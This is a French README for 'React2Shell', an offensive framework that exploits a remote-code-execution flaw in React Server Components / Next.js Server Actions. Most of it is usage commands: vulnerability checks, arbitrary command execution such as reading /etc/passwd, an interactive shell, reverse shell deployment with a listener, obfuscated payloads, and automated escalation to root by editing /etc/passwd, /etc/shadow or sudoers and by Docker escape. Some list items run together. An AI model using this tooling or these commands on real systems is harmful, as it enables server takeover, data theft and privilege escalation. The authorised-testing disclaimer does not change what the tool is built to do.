Kit d'exploitation élite pour CVE-2025-55182 (RCE des composants serveur React). Charges utiles polymorphes asynchrones, contournement avancé WAF/CDN, rotation de proxy, scan de masse Shodan/Censys, auto-pwn + shells inversés, modèles Nuclei, lab K8s et tableau de bord C2. Auteur : Sudeepa Wanigarathna – strictement réservé aux équipes rouges autorisées et aux tests d'intrusion.
██████╗ ███████╗██████╗ ██████╗ ███████╗██████╗ ██╗ ██╗
██╔════╝ ██╔════╝██╔══██╗██╔══██╗██╔════╝██╔══██╗██║ ██║
██║ █████╗ ██████╔╝██████╔╝█████╗ ██████╔╝██║ ██║
██║ ██╔══╝ ██╔══██╗██╔══██╗██╔══╝ ██╔══██╗██║ ██║
╚██████╗ ███████╗██║ ██║██████╔╝███████╗██║ ██║╚██████╔╝
╚═════╝ ╚══════╝╚═╝ ╚═╝╚═════╝ ╚══════╝╚═╝ ╚═╝ ╚═════╝
React2Shell Exploitation Framework v1.0
Author: Sudeepa Wanigarathna
Framework d'exploitation de niveau professionnel pour la vulnérabilité RCE des Server Actions Next.js (React2Shell). Démontre la chaîne d'attaque complète, de l'accès initial à l'élévation de privilèges root.
Capacités :
# Vérifier la vulnérabilité
python3 react2shell_exploit.py --target http://127.0.0.1:3000 --check
# Exécuter une commande
python3 react2shell_exploit.py --target http://127.0.0.1:3000 --cmd "id"
python3 interactive_shell.py --target http://127.0.0.1:3000
# Exploitation complète : RCE → Énumération → Accès root
python3 demo_exploit.py --target http://127.0.0.1:3000 --auto-root
Cerberus-React2Shell-Hades/
├── react2shell_exploit.py # Moteur d'exploitation principal (400+ lignes)
├── demo_exploit.py # Chaîne d'attaque automatisée (290+ lignes)
├── interactive_shell.py # Shell interactif (280+ lignes)
├── reverse_shell_handler.py # Écouteur de reverse shell (180+ lignes)
├── post_exploit/
│ ├── linux_enum.py # Énumération du système (330+ lignes)
│ ├── priv_esc.py # Élévation de privilèges (320+ lignes)
│ └── __init__.py
├── EXPLOITATION_GUIDE.md # Documentation d'utilisation complète
├── QUICKSTART.md # Référence rapide
└── BANNER.txt
# Vérification de vulnérabilité
python3 react2shell_exploit.py --target http://127.0.0.1:3000 --check
# Exécuter des commandes
python3 react2shell_exploit.py --target http://127.0.0.1:3000 --cmd "whoami"
python3 react2shell_exploit.py --target http://127.0.0.1:3000 --cmd "cat /etc/passwd"
# Différentes variantes de payload
python3 react2shell_exploit.py --target http://127.0.0.1:3000 --cmd "id" --variant spawn
# Avec obfuscation
python3 react2shell_exploit.py --target http://127.0.0.1:3000 --cmd "id" --obfuscate
# Lancer le shell
python3 interactive_shell.py --target http://127.0.0.1:3000
# Commandes disponibles :
# - execute <cmd> : Exécuter une commande shell
# - enum : Lancer une énumération complète
# - escalate : Tenter une élévation de privilèges
# - upload <local> <remote> : Téléverser un fichier
# - download <remote> <local>: Télécharger un fichier
# - shell <lhost> <lport>: Déployer un reverse shell
# - info : Afficher les informations de session
# - exit : Quitter
# Terminal 1 : Démarrer l'écouteur
python3 reverse_shell_handler.py --lport 4444
# Terminal 2 : Déployer le shell
python3 react2shell_exploit.py --target http://127.0.0.1:3000 \
--revshell --lhost 127.0.0.1 --lport 4444 --shell-type bash
# Chaîne complète : Découverte → RCE → Énumération → Root
python3 demo_exploit.py --target http://127.0.0.1:3000 --auto-root
Le framework implémente une chaîne d'exploitation complète en 6 étapes :
id/etc/shadow et en listant /rootBinaires SUID (GTFOBins)
Fichiers /etc inscriptibles
/etc/passwd - Ajouter un nouvel utilisateur root/etc/shadow - Effacer le mot de passe root/etc/sudoers - Accorder sudo NOPASSWDÉvasion Docker
Exploits du noyau
Capacités Linux
pip install -r requirements.txt
Dépendances :
EXPLOITATION_GUIDE.md - Guide d'utilisation complet avec exemplesQUICKSTART.md - Référence rapide pour les commandes courantesAVERTISSEMENT : Cet outil est destiné uniquement aux tests de sécurité autorisés. L'accès non autorisé à des systèmes informatiques est illégal. Utilisez-le uniquement sur des systèmes que vous possédez ou pour lesquels vous disposez d'une autorisation écrite explicite de test.
L'auteur n'est pas responsable de toute utilisation abusive de cet outil. Utilisation à vos propres risques.
Ce framework est conçu pour :
Licence MIT (à des fins pédagogiques uniquement)
Sudeepa Wanigarathna
Version : 1.0
Dernière mise à jour : Décembre 2025
Pour des instructions d'utilisation détaillées, consultez EXPLOITATION_GUIDE.md